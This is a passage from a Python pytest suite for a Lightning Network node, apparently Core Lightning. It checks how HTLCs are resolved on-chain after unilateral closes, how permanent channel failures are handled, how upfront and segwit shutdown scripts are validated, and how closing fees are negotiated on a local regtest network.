l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore any HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
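# Both ends invoice with the same preimage, so every HTLC added below,
# in either direction, shares a single payment_hash.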
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with the mid+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    # At depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
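    # (Depth check: 1 + 4 + 16 blocks mined since the close = depth 21,
    # matching the first two timeouts above.)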
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
    # Other timeouts are at 27, 27 and 28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
    # Other timeouts are at depths 27, 27 and 28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
    # Now, after 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # Now, after 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 100 blocks after l1 sees the tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
    # Now, after 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
    # Check that all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
    # This will block, as l2 will send an error but l1 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
    # We need to prepend the segwit version (0) and the push opcode (0x14, i.e. push 20 bytes).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
    # FIXME: Since we don't support other non-v0 encodings, we need a protocol
    # test for this (we're actually testing our upfront check, not the real
    # shutdown one!). A standalone sketch of that upfront check follows this test.
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
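# A minimal standalone sketch (not used by the tests) of the upfront check that
# the valid/invalid vectors in test_segwit_shutdown_script exercise: per the
# BOLT #2 excerpt quoted there, an option_shutdown_anysegwit script is
# OP_1..OP_16 (0x51..0x60) followed by a single push of 2 to 40 bytes.  The
# helper name is illustrative only.
def _looks_like_anysegwit_script(script_hex):
    """Return True if script_hex is OP_1..OP_16 plus a single 2-40 byte push."""
    script = bytes.fromhex(script_hex)
    if len(script) < 2:
        return False
    opcode, push_len, program = script[0], script[1], script[2:]
    # 0x51..0x60 encode OP_1 through OP_16 (witness versions 1 through 16).
    if not 0x51 <= opcode <= 0x60:
        return False
    # The push must be 2..40 bytes and must cover the remainder exactly.
    return 2 <= push_len <= 40 and len(program) == push_len
# For example, _looks_like_anysegwit_script('51020000') is True, while
# '510100' (push too short) and '61020000' (not OP_1..OP_16) are not.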
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
